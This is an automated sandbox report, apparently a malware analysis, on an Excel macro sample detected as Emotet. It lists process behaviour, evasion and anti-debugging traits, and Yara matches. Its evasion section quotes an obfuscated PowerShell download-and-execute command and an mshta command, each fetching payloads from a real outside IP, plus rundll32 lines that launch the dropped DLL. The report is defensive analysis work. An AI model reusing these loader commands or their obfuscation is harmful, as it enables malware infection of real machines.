Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 1232 Thread sleep time: -360000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Cookie: BwMZppe=k+xTN6MmPGeKtMCp9AXrdw4NHBgXIRV4ro2bUmaGDCMDXSxoBMQCwjSpwp5vyWJa/SIi0qz1YmI+MBHUUB8vdNgWC903z8XYt/+U3LubTa8EUGRipcggEilFzmzdKwyPX8iXDTkhu2TggptP0x7H3z1ypHwsIbX0FHyUJ7TCzVJ0kEDJN5n8utaI03ezj8VJBVtfGXfYxMU/qeH2NYK+NBrrnx0jLxe+CIgTACon5J58MNiO9DeQ5rXayMAH10gUjJL9LazlnjoNjuFYweaP8pmNb1zvMciD6RRtp8wSzWKlrbMfi70KtUr0oIisu2Q/UsGQ3lEVk7fDYj6lQ0/8ae4=
Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 0000000D.00000002.676502532.000000000037A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ie: BwMZppe=k+xTN6MmPGeKtMCp9AXrdw4NHBgXIRV4ro2bUmaGDCMDXSxoBMQCwjSpwp5vyWJa/SIi0qz1YmI+MBHUUB8vdNgWC903z8XYt/+U3LubTa8EUGRipcggEilFzmzdKwyPX8iXDTkhu2TggptP0x7H3z1ypHwsIbX0FHyUJ7TCzVJ0kEDJN5n8utaI03ezj8VJBVtfGXfYxMU/qeH2NYK+NBrrnx0jLxe+CIgTACon5J58MNiO9DeQ5rXayMAH10gUjJL9LazlnjoNjuFYweaP8pmNb1zvMciD6RRtp8wSzWKlrbMfi70KtUr0oIisu2Q/UsGQ3lEVk7fDYj6lQ0/8ae4=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 10_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 10_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 12_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00767E00 FindFirstFileW, 13_2_00767E00
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 10_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00224087 mov eax, dword ptr fs:[00000030h] 10_2_00224087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001F4087 mov eax, dword ptr fs:[00000030h] 11_2_001F4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00734087 mov eax, dword ptr fs:[00000030h] 12_2_00734087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00774087 mov eax, dword ptr fs:[00000030h] 13_2_00774087
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 10_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 10_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 10_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 12_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 12_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: opastonline.com.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\opastonline.com.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 10_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 10_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 10_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 12_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 12_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 12_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003DAA7 cpuid 10_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 10_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 10_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 10_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 12.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31f0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3280000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2bd0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.28f0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29a0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2fb0000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.24b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.870000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ba0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23f0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d50000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2bd0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3030000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31f0000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.870000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.24b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30d0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
